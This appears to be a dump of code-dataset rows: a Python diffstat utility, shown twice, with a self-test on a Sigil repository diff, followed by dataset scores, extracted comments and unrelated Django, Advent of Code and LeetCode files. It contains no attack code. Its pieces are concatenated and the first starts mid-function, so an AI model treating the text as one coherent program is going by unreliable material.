%s\n' if not binaryfile: hist = b'' # -- calculating histogram -- width = len(format % (b'', b'', b'')) histwidth = max(2, max_width - width) if maxdiff < histwidth: hist = b'+'*insert[i] + b'-'*delete[i] else: iratio = (float(insert[i]) / maxdiff) * histwidth dratio = (float(delete[i]) / maxdiff) * histwidth iwidth = dwidth = 0 # make sure every entry that had actual insertions gets # at least one + if insert[i] > 0: iwidth = int(iratio) if iwidth == 0 and 0 < iratio < 1: iwidth = 1 # make sure every entry that had actual deletions gets # at least one - if delete[i] > 0: dwidth = int(dratio) if dwidth == 0 and 0 < dratio < 1: dwidth = 1 hist = b'+'*int(iwidth) + b'-'*int(dwidth) output += (format % (bytes(names[i]), str(insert[i] + delete[i]).encode('ascii'), hist)) else: output += (binformat % (bytes(names[i]), b'Bin')) output += (b' %d files changed, %d insertions(+), %d deletions(-)' % (len(names), sum(insert), sum(delete))) return output def main(): argv = sys.argv # allow diffstat.py to also be used from the comand line if len(sys.argv) > 1: diffpath = argv[1] data = b'' with open(diffpath, 'rb') as f: data = f.read() lines = data.split(b'\n') result = diffstat(lines) print(result.decode('utf-8')) return 0 # if no path argument to a diff file is passed in, run # a self test. The test case includes tricky things like # a diff of diff, binary files, renames with futher changes # added files and removed files. # All extracted from Sigil-Ebook/Sigil's github repo with # full permission to use under this license. 
selftest = b""" diff --git a/docs/qt512.7_remove_bad_workaround.patch b/docs/qt512.7_remove_bad_workaround.patch new file mode 100644 index 00000000..64e34192 --- /dev/null +++ b/docs/qt512.7_remove_bad_workaround.patch @@ -0,0 +1,15 @@ +--- qtbase/src/gui/kernel/qwindow.cpp.orig 2019-12-12 09:15:59.000000000 -0500 ++++ qtbase/src/gui/kernel/qwindow.cpp 2020-01-10 10:36:53.000000000 -0500 +@@ -218,12 +218,6 @@ + QGuiApplicationPrivate::window_list.removeAll(this); + if (!QGuiApplicationPrivate::is_app_closing) + QGuiApplicationPrivate::instance()->modalWindowList.removeOne(this); +- +- // focus_window is normally cleared in destroy(), but the window may in +- // some cases end up becoming the focus window again. Clear it again +- // here as a workaround. See QTBUG-75326. +- if (QGuiApplicationPrivate::focus_window == this) +- QGuiApplicationPrivate::focus_window = 0; + } + + void QWindowPrivate::init(QScreen *targetScreen) diff --git a/docs/testplugin_v017.zip b/docs/testplugin_v017.zip new file mode 100644 index 00000000..a4cf4c4c Binary files /dev/null and b/docs/testplugin_v017.zip differ diff --git a/ci_scripts/macgddeploy.py b/ci_scripts/gddeploy.py similarity index 73% rename from ci_scripts/macgddeploy.py rename to ci_scripts/gddeploy.py index a512d075..f9dacd33 100644 --- a/ci_scripts/macgddeploy.py +++ b/ci_scripts/gddeploy.py @@ -1,19 +1,32 @@ #!/usr/bin/env python3 import os +import sys import subprocess import datetime import shutil +import glob gparent = os.path.expandvars('$GDRIVE_DIR') grefresh_token = os.path.expandvars('$GDRIVE_REFRESH_TOKEN') -travis_branch = os.path.expandvars('$TRAVIS_BRANCH') -travis_commit = os.path.expandvars('$TRAVIS_COMMIT') -travis_build_number = os.path.expandvars('$TRAVIS_BUILD_NUMBER') +if sys.platform.lower().startswith('darwin'): + travis_branch = os.path.expandvars('$TRAVIS_BRANCH') + travis_commit = os.path.expandvars('$TRAVIS_COMMIT') + travis_build_number = os.path.expandvars('$TRAVIS_BUILD_NUMBER') + + 
origfilename = './bin/Sigil.tar.xz' + newfilename = './bin/Sigil-{}-{}-build_num-{}.tar.xz'.format(travis_branch, travis_commit[:7],travis_build_numbe\ r) +else: + appveyor_branch = os.path.expandvars('$APPVEYOR_REPO_BRANCH') + appveyor_commit = os.path.expandvars('$APPVEYOR_REPO_COMMIT') + appveyor_build_number = os.path.expandvars('$APPVEYOR_BUILD_NUMBER') + names = glob.glob('.\\installer\\Sigil-*-Setup.exe') + if not names: + exit(1) + origfilename = names[0] + newfilename = '.\\installer\\Sigil-{}-{}-build_num-{}-Setup.exe'.format(appveyor_branch, appveyor_commit[:7], ap\ pveyor_build_number) -origfilename = './bin/Sigil.tar.xz' -newfilename = './bin/Sigil-{}-{}-build_num-{}.tar.xz'.format(travis_branch, travis_commit[:7],travis_build_number) shutil.copy2(origfilename, newfilename) folder_name = datetime.date.today() diff --git a/docs/qt512.6_backport_009abcd_fix.patch b/docs/qt512.6_backport_009abcd_fix.patch deleted file mode 100644 index f4724347..00000000 --- a/docs/qt512.6_backport_009abcd_fix.patch +++ /dev/null @@ -1,26 +0,0 @@ ---- qtbase/src/widgets/kernel/qwidget.cpp.orig 2019-11-08 10:57:07.000000000 -0500 -+++ qtbase/src/widgets/kernel/qwidget.cpp 2019-12-11 12:32:24.000000000 -0500 -@@ -8934,6 +8934,23 @@ - } - } - switch (event->type()) { -+ case QEvent::PlatformSurface: { -+ // Sync up QWidget's view of whether or not the widget has been created -+ switch (static_cast<QPlatformSurfaceEvent*>(event)->surfaceEventType()) { -+ case QPlatformSurfaceEvent::SurfaceCreated: -+ if (!testAttribute(Qt::WA_WState_Created)) -+ create(); -+ break; -+ case QPlatformSurfaceEvent::SurfaceAboutToBeDestroyed: -+ if (testAttribute(Qt::WA_WState_Created)) { -+ // Child windows have already been destroyed by QWindow, -+ // so we skip them here. 
-+ destroy(false, false); -+ } -+ break; -+ } -+ break; -+ } - case QEvent::MouseMove: - mouseMoveEvent((QMouseEvent*)event); - break; diff --git a/docs/Building_Sigil_On_MacOSX.txt b/docs/Building_Sigil_On_MacOSX.txt index 3b41fd80..64914c78 100644 --- a/docs/Building_Sigil_On_MacOSX.txt +++ b/docs/Building_Sigil_On_MacOSX.txt @@ -113,7 +113,7 @@ install_name_tool -add_rpath @loader_path/../../Frameworks ./bin/Sigil.app/Content # To test if the newly bundled python 3 version of Sigil is working properly ypou can do the following: -1. download testplugin_v014.zip from https://github.com/Sigil-Ebook/Sigil/tree/master/docs +1. download testplugin_v017.zip from https://github.com/Sigil-Ebook/Sigil/tree/master/docs 2. open Sigil.app to the normal nearly blank template epub it generates when opened 3. use Plugins->Manage Plugins menu and make sure the "Use Bundled Python" checkbox is checked 4. use the "Add Plugin" button to navigate to and add testplugin.zip and then hit "Okay" to exit the Manage Plugins Dialog """ # noqa: E501 W293 testoutput = b""" docs/qt512.7_remove_bad_workaround.patch | 15 ++++++++++++ docs/testplugin_v017.zip | Bin ci_scripts/macgddeploy.py => ci_scripts/gddeploy.py | 0 docs/qt512.6_backport_009abcd_fix.patch | 26 --------------------- docs/Building_Sigil_On_MacOSX.txt | 2 +- 5 files changed, 16 insertions(+), 27 deletions(-)""" # noqa: W291 # return 0 on success otherwise return -1 result = diffstat(selftest.split(b'\n')) if result == testoutput: print("self test passed") return 0 print("self test failed") print("Received:") print(result.decode('utf-8')) print("Expected:") print(testoutput.decode('utf-8')) return -1 if __name__ == '__main__': sys.exit(main())
#!/usr/bin/env python # -*- coding: utf-8 -*- # vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab # Copyright (c) 2020 <NAME>, Stratford Ontario Canada # All rights reserved. # # This diffstat code was extracted and heavily modified from: # # https://github.com/techtonik/python-patch # Under the following license: # # Patch utility to apply unified diffs # Brute-force line-by-line non-recursive parsing # # Copyright (c) 2008-2016 <NAME> # Available under the terms of MIT license # # and falls under the exact same MIT license import sys import re # only needs to detect git style diffs as this is for # use with dulwich _git_header_name = re.compile(br'diff --git a/(.*) b/(.*)') _GIT_HEADER_START = b'diff --git a/' _GIT_BINARY_START = b'Binary file' _GIT_RENAMEFROM_START = b'rename from' _GIT_RENAMETO_START = b'rename to' _GIT_CHUNK_START = b'@@' _GIT_ADDED_START = b'+' _GIT_DELETED_START = b'-' _GIT_UNCHANGED_START = b' ' # emulate original full Patch class by just extracting # filename and minimal chunk added/deleted information to # properly interface with diffstat routine def _parse_patch(lines): """An internal routine to parse a git style diff or patch to generate diff stats Args: lines: list of byte strings "lines" from the diff to be parsed Returns: A tuple (names, nametypes, counts) of three lists: names = list of repo relative file paths nametypes - list of booolean values indicating if file is binary (True means binary file) counts = list of tuples of (added, deleted) counts for that file """ names = [] nametypes = [] counts = [] in_patch_chunk = in_git_header = binaryfile = False currentfile = None added = deleted = 0 for line in lines: if line.startswith(_GIT_HEADER_START): if currentfile is not None: names.append(currentfile) nametypes.append(binaryfile) counts.append((added, deleted)) currentfile = _git_header_name.search(line).group(2) binaryfile = False added = deleted = 0 in_git_header = True in_patch_chunk = False elif line.startswith(_GIT_BINARY_START) 
and in_git_header: binaryfile = True in_git_header = False elif line.startswith(_GIT_RENAMEFROM_START) and in_git_header: currentfile = line[12:] elif line.startswith(_GIT_RENAMETO_START) and in_git_header: currentfile += b' => %s' % line[10:] elif line.startswith(_GIT_CHUNK_START) and \ (in_patch_chunk or in_git_header): in_patch_chunk = True in_git_header = False elif line.startswith(_GIT_ADDED_START) and in_patch_chunk: added += 1 elif line.startswith(_GIT_DELETED_START) and in_patch_chunk: deleted += 1 elif not line.startswith(_GIT_UNCHANGED_START) and in_patch_chunk: in_patch_chunk = False # handle end of input if currentfile is not None: names.append(currentfile) nametypes.append(binaryfile) counts.append((added, deleted)) return names, nametypes, counts # note must all done using bytes not string because on linux filenames # may not be encodable even to utf-8 def diffstat(lines, max_width=80): """Generate summary statistics from a git style diff ala (git diff tag1 tag2 --stat) Args: lines: list of byte string "lines" from the diff to be parsed max_width: maximum line length for generating the summary statistics (default 80) Returns: A byte string that lists the changed files with change counts and histogram """ names, nametypes, counts = _parse_patch(lines) insert = [] delete = [] namelen = 0 maxdiff = 0 # max changes for any file used for histogram width calc for i, filename in enumerate(names): i, d = counts[i] insert.append(i) delete.append(d) namelen = max(namelen, len(filename)) maxdiff = max(maxdiff, i+d) output = b'' statlen = len(str(maxdiff)) # stats column width for i, n in enumerate(names): binaryfile = nametypes[i] # %-19s | %-4d %s # note b'%d' % namelen is not supported until Python 3.5 # To convert an int to a format width specifier for byte # strings use str(namelen).encode('ascii') format = b' %-' + str(namelen).encode('ascii') + \ b's | %' + str(statlen).encode('ascii') + b's %s\n' binformat = b' %-' + str(namelen).encode('ascii') + b's | 
%s\n' if not binaryfile: hist = b'' # -- calculating histogram -- width = len(format % (b'', b'', b'')) histwidth = max(2, max_width - width) if maxdiff < histwidth: hist = b'+'*insert[i] + b'-'*delete[i] else: iratio = (float(insert[i]) / maxdiff) * histwidth dratio = (float(delete[i]) / maxdiff) * histwidth iwidth = dwidth = 0 # make sure every entry that had actual insertions gets # at least one + if insert[i] > 0: iwidth = int(iratio) if iwidth == 0 and 0 < iratio < 1: iwidth = 1 # make sure every entry that had actual deletions gets # at least one - if delete[i] > 0: dwidth = int(dratio) if dwidth == 0 and 0 < dratio < 1: dwidth = 1 hist = b'+'*int(iwidth) + b'-'*int(dwidth) output += (format % (bytes(names[i]), str(insert[i] + delete[i]).encode('ascii'), hist)) else: output += (binformat % (bytes(names[i]), b'Bin')) output += (b' %d files changed, %d insertions(+), %d deletions(-)' % (len(names), sum(insert), sum(delete))) return output def main(): argv = sys.argv # allow diffstat.py to also be used from the comand line if len(sys.argv) > 1: diffpath = argv[1] data = b'' with open(diffpath, 'rb') as f: data = f.read() lines = data.split(b'\n') result = diffstat(lines) print(result.decode('utf-8')) return 0 # if no path argument to a diff file is passed in, run # a self test. The test case includes tricky things like # a diff of diff, binary files, renames with futher changes # added files and removed files. # All extracted from Sigil-Ebook/Sigil's github repo with # full permission to use under this license. 
selftest = b""" diff --git a/docs/qt512.7_remove_bad_workaround.patch b/docs/qt512.7_remove_bad_workaround.patch new file mode 100644 index 00000000..64e34192 --- /dev/null +++ b/docs/qt512.7_remove_bad_workaround.patch @@ -0,0 +1,15 @@ +--- qtbase/src/gui/kernel/qwindow.cpp.orig 2019-12-12 09:15:59.000000000 -0500 ++++ qtbase/src/gui/kernel/qwindow.cpp 2020-01-10 10:36:53.000000000 -0500 +@@ -218,12 +218,6 @@ + QGuiApplicationPrivate::window_list.removeAll(this); + if (!QGuiApplicationPrivate::is_app_closing) + QGuiApplicationPrivate::instance()->modalWindowList.removeOne(this); +- +- // focus_window is normally cleared in destroy(), but the window may in +- // some cases end up becoming the focus window again. Clear it again +- // here as a workaround. See QTBUG-75326. +- if (QGuiApplicationPrivate::focus_window == this) +- QGuiApplicationPrivate::focus_window = 0; + } + + void QWindowPrivate::init(QScreen *targetScreen) diff --git a/docs/testplugin_v017.zip b/docs/testplugin_v017.zip new file mode 100644 index 00000000..a4cf4c4c Binary files /dev/null and b/docs/testplugin_v017.zip differ diff --git a/ci_scripts/macgddeploy.py b/ci_scripts/gddeploy.py similarity index 73% rename from ci_scripts/macgddeploy.py rename to ci_scripts/gddeploy.py index a512d075..f9dacd33 100644 --- a/ci_scripts/macgddeploy.py +++ b/ci_scripts/gddeploy.py @@ -1,19 +1,32 @@ #!/usr/bin/env python3 import os +import sys import subprocess import datetime import shutil +import glob gparent = os.path.expandvars('$GDRIVE_DIR') grefresh_token = os.path.expandvars('$GDRIVE_REFRESH_TOKEN') -travis_branch = os.path.expandvars('$TRAVIS_BRANCH') -travis_commit = os.path.expandvars('$TRAVIS_COMMIT') -travis_build_number = os.path.expandvars('$TRAVIS_BUILD_NUMBER') +if sys.platform.lower().startswith('darwin'): + travis_branch = os.path.expandvars('$TRAVIS_BRANCH') + travis_commit = os.path.expandvars('$TRAVIS_COMMIT') + travis_build_number = os.path.expandvars('$TRAVIS_BUILD_NUMBER') + + 
origfilename = './bin/Sigil.tar.xz' + newfilename = './bin/Sigil-{}-{}-build_num-{}.tar.xz'.format(travis_branch, travis_commit[:7],travis_build_numbe\ r) +else: + appveyor_branch = os.path.expandvars('$APPVEYOR_REPO_BRANCH') + appveyor_commit = os.path.expandvars('$APPVEYOR_REPO_COMMIT') + appveyor_build_number = os.path.expandvars('$APPVEYOR_BUILD_NUMBER') + names = glob.glob('.\\installer\\Sigil-*-Setup.exe') + if not names: + exit(1) + origfilename = names[0] + newfilename = '.\\installer\\Sigil-{}-{}-build_num-{}-Setup.exe'.format(appveyor_branch, appveyor_commit[:7], ap\ pveyor_build_number) -origfilename = './bin/Sigil.tar.xz' -newfilename = './bin/Sigil-{}-{}-build_num-{}.tar.xz'.format(travis_branch, travis_commit[:7],travis_build_number) shutil.copy2(origfilename, newfilename) folder_name = datetime.date.today() diff --git a/docs/qt512.6_backport_009abcd_fix.patch b/docs/qt512.6_backport_009abcd_fix.patch deleted file mode 100644 index f4724347..00000000 --- a/docs/qt512.6_backport_009abcd_fix.patch +++ /dev/null @@ -1,26 +0,0 @@ ---- qtbase/src/widgets/kernel/qwidget.cpp.orig 2019-11-08 10:57:07.000000000 -0500 -+++ qtbase/src/widgets/kernel/qwidget.cpp 2019-12-11 12:32:24.000000000 -0500 -@@ -8934,6 +8934,23 @@ - } - } - switch (event->type()) { -+ case QEvent::PlatformSurface: { -+ // Sync up QWidget's view of whether or not the widget has been created -+ switch (static_cast<QPlatformSurfaceEvent*>(event)->surfaceEventType()) { -+ case QPlatformSurfaceEvent::SurfaceCreated: -+ if (!testAttribute(Qt::WA_WState_Created)) -+ create(); -+ break; -+ case QPlatformSurfaceEvent::SurfaceAboutToBeDestroyed: -+ if (testAttribute(Qt::WA_WState_Created)) { -+ // Child windows have already been destroyed by QWindow, -+ // so we skip them here. 
-+ destroy(false, false); -+ } -+ break; -+ } -+ break; -+ } - case QEvent::MouseMove: - mouseMoveEvent((QMouseEvent*)event); - break; diff --git a/docs/Building_Sigil_On_MacOSX.txt b/docs/Building_Sigil_On_MacOSX.txt index 3b41fd80..64914c78 100644 --- a/docs/Building_Sigil_On_MacOSX.txt +++ b/docs/Building_Sigil_On_MacOSX.txt @@ -113,7 +113,7 @@ install_name_tool -add_rpath @loader_path/../../Frameworks ./bin/Sigil.app/Content # To test if the newly bundled python 3 version of Sigil is working properly ypou can do the following: -1. download testplugin_v014.zip from https://github.com/Sigil-Ebook/Sigil/tree/master/docs +1. download testplugin_v017.zip from https://github.com/Sigil-Ebook/Sigil/tree/master/docs 2. open Sigil.app to the normal nearly blank template epub it generates when opened 3. use Plugins->Manage Plugins menu and make sure the "Use Bundled Python" checkbox is checked 4. use the "Add Plugin" button to navigate to and add testplugin.zip and then hit "Okay" to exit the Manage Plugins Dialog """ # noqa: E501 W293 testoutput = b""" docs/qt512.7_remove_bad_workaround.patch | 15 ++++++++++++ docs/testplugin_v017.zip | Bin ci_scripts/macgddeploy.py => ci_scripts/gddeploy.py | 0 docs/qt512.6_backport_009abcd_fix.patch | 26 --------------------- docs/Building_Sigil_On_MacOSX.txt | 2 +- 5 files changed, 16 insertions(+), 27 deletions(-)""" # noqa: W291 # return 0 on success otherwise return -1 result = diffstat(selftest.split(b'\n')) if result == testoutput: print("self test passed") return 0 print("self test failed") print("Received:") print(result.decode('utf-8')) print("Expected:") print(testoutput.decode('utf-8')) return -1 if __name__ == '__main__': sys.exit(main())
en
0.587035
#!/usr/bin/env python # -*- coding: utf-8 -*- # vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab # Copyright (c) 2020 <NAME>, Stratford Ontario Canada # All rights reserved. # # This diffstat code was extracted and heavily modified from: # # https://github.com/techtonik/python-patch # Under the following license: # # Patch utility to apply unified diffs # Brute-force line-by-line non-recursive parsing # # Copyright (c) 2008-2016 <NAME> # Available under the terms of MIT license # # and falls under the exact same MIT license # only needs to detect git style diffs as this is for # use with dulwich # emulate original full Patch class by just extracting # filename and minimal chunk added/deleted information to # properly interface with diffstat routine An internal routine to parse a git style diff or patch to generate diff stats Args: lines: list of byte strings "lines" from the diff to be parsed Returns: A tuple (names, nametypes, counts) of three lists: names = list of repo relative file paths nametypes - list of booolean values indicating if file is binary (True means binary file) counts = list of tuples of (added, deleted) counts for that file # handle end of input # note must all done using bytes not string because on linux filenames # may not be encodable even to utf-8 Generate summary statistics from a git style diff ala (git diff tag1 tag2 --stat) Args: lines: list of byte string "lines" from the diff to be parsed max_width: maximum line length for generating the summary statistics (default 80) Returns: A byte string that lists the changed files with change counts and histogram # max changes for any file used for histogram width calc # stats column width # %-19s | %-4d %s # note b'%d' % namelen is not supported until Python 3.5 # To convert an int to a format width specifier for byte # strings use str(namelen).encode('ascii') # -- calculating histogram -- # make sure every entry that had actual insertions gets # at least one + # make sure every entry that had 
actual deletions gets # at least one - # allow diffstat.py to also be used from the comand line # if no path argument to a diff file is passed in, run # a self test. The test case includes tricky things like # a diff of diff, binary files, renames with futher changes # added files and removed files. # All extracted from Sigil-Ebook/Sigil's github repo with # full permission to use under this license. diff --git a/docs/qt512.7_remove_bad_workaround.patch b/docs/qt512.7_remove_bad_workaround.patch new file mode 100644 index 00000000..64e34192 --- /dev/null +++ b/docs/qt512.7_remove_bad_workaround.patch @@ -0,0 +1,15 @@ +--- qtbase/src/gui/kernel/qwindow.cpp.orig 2019-12-12 09:15:59.000000000 -0500 ++++ qtbase/src/gui/kernel/qwindow.cpp 2020-01-10 10:36:53.000000000 -0500 +@@ -218,12 +218,6 @@ + QGuiApplicationPrivate::window_list.removeAll(this); + if (!QGuiApplicationPrivate::is_app_closing) + QGuiApplicationPrivate::instance()->modalWindowList.removeOne(this); +- +- // focus_window is normally cleared in destroy(), but the window may in +- // some cases end up becoming the focus window again. Clear it again +- // here as a workaround. See QTBUG-75326. 
+- if (QGuiApplicationPrivate::focus_window == this) +- QGuiApplicationPrivate::focus_window = 0; + } + + void QWindowPrivate::init(QScreen *targetScreen) diff --git a/docs/testplugin_v017.zip b/docs/testplugin_v017.zip new file mode 100644 index 00000000..a4cf4c4c Binary files /dev/null and b/docs/testplugin_v017.zip differ diff --git a/ci_scripts/macgddeploy.py b/ci_scripts/gddeploy.py similarity index 73% rename from ci_scripts/macgddeploy.py rename to ci_scripts/gddeploy.py index a512d075..f9dacd33 100644 --- a/ci_scripts/macgddeploy.py +++ b/ci_scripts/gddeploy.py @@ -1,19 +1,32 @@ #!/usr/bin/env python3 import os +import sys import subprocess import datetime import shutil +import glob gparent = os.path.expandvars('$GDRIVE_DIR') grefresh_token = os.path.expandvars('$GDRIVE_REFRESH_TOKEN') -travis_branch = os.path.expandvars('$TRAVIS_BRANCH') -travis_commit = os.path.expandvars('$TRAVIS_COMMIT') -travis_build_number = os.path.expandvars('$TRAVIS_BUILD_NUMBER') +if sys.platform.lower().startswith('darwin'): + travis_branch = os.path.expandvars('$TRAVIS_BRANCH') + travis_commit = os.path.expandvars('$TRAVIS_COMMIT') + travis_build_number = os.path.expandvars('$TRAVIS_BUILD_NUMBER') + + origfilename = './bin/Sigil.tar.xz' + newfilename = './bin/Sigil-{}-{}-build_num-{}.tar.xz'.format(travis_branch, travis_commit[:7],travis_build_numbe\ r) +else: + appveyor_branch = os.path.expandvars('$APPVEYOR_REPO_BRANCH') + appveyor_commit = os.path.expandvars('$APPVEYOR_REPO_COMMIT') + appveyor_build_number = os.path.expandvars('$APPVEYOR_BUILD_NUMBER') + names = glob.glob('.\\installer\\Sigil-*-Setup.exe') + if not names: + exit(1) + origfilename = names[0] + newfilename = '.\\installer\\Sigil-{}-{}-build_num-{}-Setup.exe'.format(appveyor_branch, appveyor_commit[:7], ap\ pveyor_build_number) -origfilename = './bin/Sigil.tar.xz' -newfilename = './bin/Sigil-{}-{}-build_num-{}.tar.xz'.format(travis_branch, travis_commit[:7],travis_build_number) shutil.copy2(origfilename, 
newfilename) folder_name = datetime.date.today() diff --git a/docs/qt512.6_backport_009abcd_fix.patch b/docs/qt512.6_backport_009abcd_fix.patch deleted file mode 100644 index f4724347..00000000 --- a/docs/qt512.6_backport_009abcd_fix.patch +++ /dev/null @@ -1,26 +0,0 @@ ---- qtbase/src/widgets/kernel/qwidget.cpp.orig 2019-11-08 10:57:07.000000000 -0500 -+++ qtbase/src/widgets/kernel/qwidget.cpp 2019-12-11 12:32:24.000000000 -0500 -@@ -8934,6 +8934,23 @@ - } - } - switch (event->type()) { -+ case QEvent::PlatformSurface: { -+ // Sync up QWidget's view of whether or not the widget has been created -+ switch (static_cast<QPlatformSurfaceEvent*>(event)->surfaceEventType()) { -+ case QPlatformSurfaceEvent::SurfaceCreated: -+ if (!testAttribute(Qt::WA_WState_Created)) -+ create(); -+ break; -+ case QPlatformSurfaceEvent::SurfaceAboutToBeDestroyed: -+ if (testAttribute(Qt::WA_WState_Created)) { -+ // Child windows have already been destroyed by QWindow, -+ // so we skip them here. -+ destroy(false, false); -+ } -+ break; -+ } -+ break; -+ } - case QEvent::MouseMove: - mouseMoveEvent((QMouseEvent*)event); - break; diff --git a/docs/Building_Sigil_On_MacOSX.txt b/docs/Building_Sigil_On_MacOSX.txt index 3b41fd80..64914c78 100644 --- a/docs/Building_Sigil_On_MacOSX.txt +++ b/docs/Building_Sigil_On_MacOSX.txt @@ -113,7 +113,7 @@ install_name_tool -add_rpath @loader_path/../../Frameworks ./bin/Sigil.app/Content # To test if the newly bundled python 3 version of Sigil is working properly ypou can do the following: -1. download testplugin_v014.zip from https://github.com/Sigil-Ebook/Sigil/tree/master/docs +1. download testplugin_v017.zip from https://github.com/Sigil-Ebook/Sigil/tree/master/docs 2. open Sigil.app to the normal nearly blank template epub it generates when opened 3. use Plugins->Manage Plugins menu and make sure the "Use Bundled Python" checkbox is checked 4. 
use the "Add Plugin" button to navigate to and add testplugin.zip and then hit "Okay" to exit the Manage Plugins Dialog # noqa: E501 W293 docs/qt512.7_remove_bad_workaround.patch | 15 ++++++++++++ docs/testplugin_v017.zip | Bin ci_scripts/macgddeploy.py => ci_scripts/gddeploy.py | 0 docs/qt512.6_backport_009abcd_fix.patch | 26 --------------------- docs/Building_Sigil_On_MacOSX.txt | 2 +- 5 files changed, 16 insertions(+), 27 deletions(-) # noqa: W291 # return 0 on success otherwise return -1
2.22
2
mva_demo/cms/urls.py
dieterplex/cookiebutter-django-demo
0
6628992
from django.urls import path from .views import ( song_all, song_detail, category_list, like_song, unlike_song ) app_name = 'cms' urlpatterns = [ path('', song_all, name='song_all'), path('<slug:slug>', song_detail, name='song_detail'), path('category/<slug:category_slug>/', category_list, name='category_list'), path('like/<slug:slug>/', like_song, name="like_song"), path('unlike/<slug:slug>/', unlike_song, name="unlike_song") ]
from django.urls import path from .views import ( song_all, song_detail, category_list, like_song, unlike_song ) app_name = 'cms' urlpatterns = [ path('', song_all, name='song_all'), path('<slug:slug>', song_detail, name='song_detail'), path('category/<slug:category_slug>/', category_list, name='category_list'), path('like/<slug:slug>/', like_song, name="like_song"), path('unlike/<slug:slug>/', unlike_song, name="unlike_song") ]
none
1
1.854293
2
src/nexus_streamer/data_source.py
ess-dmsc/nexus-streamer-python
0
6628993
<filename>src/nexus_streamer/data_source.py from typing import Union from .event_data_source import EventDataSource, FakeEventDataSource from .log_data_source import LogDataSource from .isis_data_source import IsisDataSource DataSource = Union[LogDataSource, EventDataSource, FakeEventDataSource, IsisDataSource]
<filename>src/nexus_streamer/data_source.py from typing import Union from .event_data_source import EventDataSource, FakeEventDataSource from .log_data_source import LogDataSource from .isis_data_source import IsisDataSource DataSource = Union[LogDataSource, EventDataSource, FakeEventDataSource, IsisDataSource]
none
1
1.260138
1
2019/day20/solutions.py
ivobatkovic/advent-of-code
3
6628994
<reponame>ivobatkovic/advent-of-code<gh_stars>1-10 from os.path import dirname from os.path import realpath from os.path import join import time import pytest import sys sys.path.append(join(dirname(realpath(__file__)), *[".."])) from day20.donut import Donut def part1(input_): donut = Donut(input_) return donut.shortest_path() def part2(input_): donut = Donut(input_) return donut.shortest_path(True) def main(): # Open data file and read through all lines file_location = "data/input.txt" try: dir_path = dirname(realpath(__file__)) with open(join(dir_path, file_location), "r") as f: input_ = f.read() t0 = time.time() sol_part1 = part1(input_) time_end = round((time.time() - t0) * 1e3) print( "Solution to part one: %s (time taken %s[ms])" % (sol_part1, time_end) ) t0 = time.time() sol_part2 = part2(input_) time_end = round((time.time() - t0) * 1e3) print( "Solution to part two: %s (time taken %s[ms])" % (sol_part2, time_end) ) except IOError: print("Cannot find file at: " + file_location) if __name__ == "__main__": main() @pytest.mark.parametrize( "input1,steps1", [ ("data/test_input0.txt", 23), ("data/test_input1.txt", 58), ], ) def test_step1(input1, steps1): dir_path = dirname(realpath(__file__)) with open(join(dir_path, input1), "r") as f: input_ = f.read() assert part1(input_) == steps1 @pytest.mark.parametrize( "input2,steps2", [ ("data/test_input0.txt", 26), ("data/test_input2.txt", 396), ], ) def test_step2(input2, steps2): dir_path = dirname(realpath(__file__)) with open(join(dir_path, input2), "r") as f: input_ = f.read() assert part2(input_) == steps2
from os.path import dirname from os.path import realpath from os.path import join import time import pytest import sys sys.path.append(join(dirname(realpath(__file__)), *[".."])) from day20.donut import Donut def part1(input_): donut = Donut(input_) return donut.shortest_path() def part2(input_): donut = Donut(input_) return donut.shortest_path(True) def main(): # Open data file and read through all lines file_location = "data/input.txt" try: dir_path = dirname(realpath(__file__)) with open(join(dir_path, file_location), "r") as f: input_ = f.read() t0 = time.time() sol_part1 = part1(input_) time_end = round((time.time() - t0) * 1e3) print( "Solution to part one: %s (time taken %s[ms])" % (sol_part1, time_end) ) t0 = time.time() sol_part2 = part2(input_) time_end = round((time.time() - t0) * 1e3) print( "Solution to part two: %s (time taken %s[ms])" % (sol_part2, time_end) ) except IOError: print("Cannot find file at: " + file_location) if __name__ == "__main__": main() @pytest.mark.parametrize( "input1,steps1", [ ("data/test_input0.txt", 23), ("data/test_input1.txt", 58), ], ) def test_step1(input1, steps1): dir_path = dirname(realpath(__file__)) with open(join(dir_path, input1), "r") as f: input_ = f.read() assert part1(input_) == steps1 @pytest.mark.parametrize( "input2,steps2", [ ("data/test_input0.txt", 26), ("data/test_input2.txt", 396), ], ) def test_step2(input2, steps2): dir_path = dirname(realpath(__file__)) with open(join(dir_path, input2), "r") as f: input_ = f.read() assert part2(input_) == steps2
en
0.956298
# Open data file and read through all lines
2.608625
3
191.number of 1 bits.py
zhuxiangxiao/leetcode
0
6628995
<filename>191.number of 1 bits.py class Solution(object): def hammingWeight(self, n): """ :type n: int :rtype: int """ return len(str(bin(n)).split('1'))-1 def hammingWeightSolution2(self, n): """ :type n: int :rtype: int """ ans=0 while n: ans+=n%2 n /= 2 return ans def stringToInt(input): return int(input) def intToString(input): if input is None: input = 0 return str(input) def main(): import sys def readlines(): for line in sys.stdin: yield line.strip('\n') lines = readlines() while True: try: line = lines.next() n = stringToInt(line) ret = Solution().hammingWeight(n) out = intToString(ret) print out except StopIteration: break if __name__ == '__main__': main()
<filename>191.number of 1 bits.py class Solution(object): def hammingWeight(self, n): """ :type n: int :rtype: int """ return len(str(bin(n)).split('1'))-1 def hammingWeightSolution2(self, n): """ :type n: int :rtype: int """ ans=0 while n: ans+=n%2 n /= 2 return ans def stringToInt(input): return int(input) def intToString(input): if input is None: input = 0 return str(input) def main(): import sys def readlines(): for line in sys.stdin: yield line.strip('\n') lines = readlines() while True: try: line = lines.next() n = stringToInt(line) ret = Solution().hammingWeight(n) out = intToString(ret) print out except StopIteration: break if __name__ == '__main__': main()
en
0.260107
:type n: int :rtype: int :type n: int :rtype: int
3.659936
4
cybox/test/objects/win_filemapping_test.py
Mattlk13/python-cybox
40
6628996
